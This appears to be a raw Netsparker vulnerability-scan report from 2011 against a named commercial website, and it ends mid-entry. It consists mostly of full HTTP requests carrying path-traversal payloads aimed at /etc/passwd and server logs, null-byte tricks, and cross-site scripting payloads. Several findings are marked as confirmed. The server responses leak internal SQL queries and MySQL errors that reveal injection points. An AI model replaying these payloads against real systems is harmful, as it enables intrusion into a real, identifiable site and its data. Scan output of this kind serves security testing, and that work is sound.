OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4h0o1ef1iqoib68788v6140l44; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F0)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?'"--></style></script><script>alert(0x0005F3..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F3)</script>

Request

GET /ppc/leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9f6g2uhuoqhnvgvkgh2llkd8p0; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?'"--></style></script><script>netsparker(0x0005F3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E

/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005F5)</script>

Request

GET /ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9aepacs16qh1u756qhjbf0os42; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>' OR prj.project_page_url = 'leadflow/dima00/'"--></style></script><script>netsparker(0x0005F5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005F6)</script>
iusrc GET iupsc

Request

